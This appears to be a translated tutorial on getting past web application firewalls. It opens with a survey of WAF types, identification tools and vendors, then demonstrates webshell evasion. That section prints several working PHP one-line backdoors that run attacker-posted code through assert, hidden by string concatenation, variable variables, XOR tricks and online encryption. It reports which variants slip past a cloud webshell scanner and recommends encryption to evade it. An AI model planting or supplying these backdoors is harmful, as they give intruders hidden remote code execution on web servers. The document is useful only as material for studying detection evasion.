WAF bypassing mainly focuses on four stages: information collection, vulnerability discovery, vulnerability utilization, and authority control.
1. What is WAF?
Web Application Firewall (web application firewall), a well-recognized statement is “a product that web application firewall provides protection for web applications by implementing a series of security policies for HTTP/HTTPS.
Basically can be divided into the following four types:
Software WAF
Installed on the server in the form of software, you can access the files on the server, so you can detect whether there is a webshell on the server, whether there are files created, etc.
Hardware WAF
It is deployed in the link in the form of hardware and supports multiple deployment methods. When connected in series to the link, malicious traffic can be intercepted. In bypass monitoring mode, only attacks are recorded but not intercepted.
Cloud WAF
Generally, it works in the form of a reverse proxy. After configuration, the request data for the website will first pass through the WAF host, and the WAF host will filter the data before passing it to the server.
Web site built-in WAF
It comes from the internal filtering of the website, which appears directly in the website code, such as mandatory class conversion of input parameters, sensitive word detection of input parameters and so on.
2. How to judge WAF?
Wafw00f identification tool: https://github.com/EnableSecurity/wafw00f
Image recognition: https://mp.weixin.qq.com/s/3uUZKryCufQ_HcuMc8ZgQQ
Other project scripting platforms.
3What are the current common WAF products?
Reference: https://blog.csdn.net/w2sft/article/details/104533082/
① Hardware type
Hardware-based WAF exists in the form of an independent hardware device, and supports deployment to the network in multiple ways (such as transparent bridge mode, bypass mode, reverse proxy, etc.) to provide security protection for back-end Web applications. It is the most traditional The type of WAF deployed in the surveyed enterprises accounted for 35.2%. Compared with the WAF of the software product category, the advantages of this type of product are good performance, comprehensive functions, and support for multi-mode deployment, etc., but its price is usually more expensive. The WAFs of domestic veteran manufacturers such as NSFOCUS, Anheng, and Venustech all fall into this category.
② Software type
This type of WAF is realized by pure software, which is characterized by simple installation, easy use, and low cost. But its shortcomings are also obvious. In addition to the limited performance, there may also be compatibility, security and other issues. Representatives of this type of WAF include ModSecurity, Naxsi, ShareWAF, SafeDog, etc.
③ Cloud WAF
With the rapid development of cloud computing technology, it is possible to implement cloud-based WAF. In this survey, the proportion even surpassed that of traditional hardware WAF and jumped to the first place, reaching 39.4%. Alibaba Cloud, Tencent Cloud, Sangfor Cloud WAF, and Imperva WAF are typical representatives of this type of WAF.
4. Demonstration: Code-Script Backdoor Anti-kill Variation-Passing Parameters & amp;< /strong>Override & amp;Encrypted mutation & amp;XOR
1.Bring in parameters
Backdoor code:
<?php $a=$_GET['a']; $aa=$a.'ert'; $aa(base64_decode($_POST['x'])); ?>
Pass parameters: a=ass
Use the Alibaba Cloud Webshell detection platform to detect script code
Address: https://ti.aliyun.com/#/webshell
Put in the script backdoor code:
Detected as malicious script:
2.Variable override
Backdoor code:
<?php $a='b'; $b='assert'; $$a(base64_decode($_POST['x'])); ?>
Use the Alibaba Cloud Webshell detection platform to detect script code
Put in the script backdoor code:
Detected as malicious script:
3.Exclusive OR operation
Backdoor code:
<?php $a=('!'^'@').'ssert'; $a($_POST[x]); ?>
After XOR operation(‘!’^‘@’) the value is a:
Use the Alibaba Cloud Webshell detection platform to detect script code
Put in the script backdoor code:
Detected as malicious script:
4.Confusion/Encrypted variation
Upload the script backdoor code after encryption
Online encryption:
Free Online Developer Tools – TOOLFK
PHP encryption – PHP online encryption platform
php encryption | php online encryption | php component encryption | php source code encryption | zend encryption | ionCube9 encryption | the best PHP online encryption tool
Script backdoor code:
<?php $a=$_GET['a']; $aa=$a.'ert'; $aa(base64_decode($_POST['x'])); ?>
To encrypt online:
Address: https://www.phpjiami.com/phpjiami.html
Generate a zip file after encryption
Unzip the file to get the encrypted file:
Use the Alibaba Cloud Webshell detection platform to detect script code
Put in the script backdoor file:
Successfully bypassed detection:
Therefore, the most practical way to prevent script backdoors is to encrypt mutations.